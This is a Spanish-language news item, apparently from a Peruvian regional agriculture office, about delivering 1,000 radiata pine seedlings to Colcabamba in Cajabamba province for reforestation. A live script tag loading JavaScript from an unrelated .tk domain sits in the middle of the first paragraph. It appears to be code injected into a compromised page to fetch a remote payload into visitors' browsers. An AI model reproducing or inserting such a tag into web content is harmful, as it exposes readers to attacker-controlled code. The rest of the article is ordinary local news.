Ingresar

DRAC ENTREGA 1 MIL PLANTANES DE PINO AL CENTRO POBLADO DE COLCABAMBA EN CAJABAMBA

Jueves, 22 Febrero, 2018 - 17:24
La Dirección Regional de Agricultura Cajamarca a través de la Agencia Agraria Cajabamba entregó mil plantones de la variedad pino radiata, al centro poblado de Colcabamba, provincia de Cajabamba.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Percy Burgos Reyna, director de la Agencia Agraria Cajabamba, dijo que se viene trabajando coordinadamente con los diferentes sectores y caseríos de la provincia de Cajabamba.  “Por ello el día de entregamos mil plantones de Pino Radiata, a favor del Centro Poblado de Colcabamba”, agregó.

Se van a reforestar las zonas altas del centro poblado. La Agencia Agraria cuenta con un vivero  con gran diversidad de productos como: Pino, Tara, en sus tres variedades blanca, roja y la barbada.

Así mismo hizo un llamado a todos los agricultores de la zona que quieran sembrar en sus respectivos terrenos, acercarse a la Agencia Agraria para que se les haga la respectiva entrega de las diferentes variedades que ellos los soliciten. Posteriormente se les hará su respectivo seguimiento para poder ver si fue debidamente sembrado en campo definitivo.

Cesar Castillo Santos, Alcalde del Centro Poblado de Colcabamba, manifestó que esta entrega es un gran gesto que se tiene con esta comunidad ya que con ello están contribuyendo a la reforestación y al cuidado del medio ambiente, puesto que  las plantas son muy necesarias para proteger el colchón hídrico que es muy necesario en las partes altas de la provincia de Cajabamba.

AdjuntoTamaño
PDF icon Descarge 360.22 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen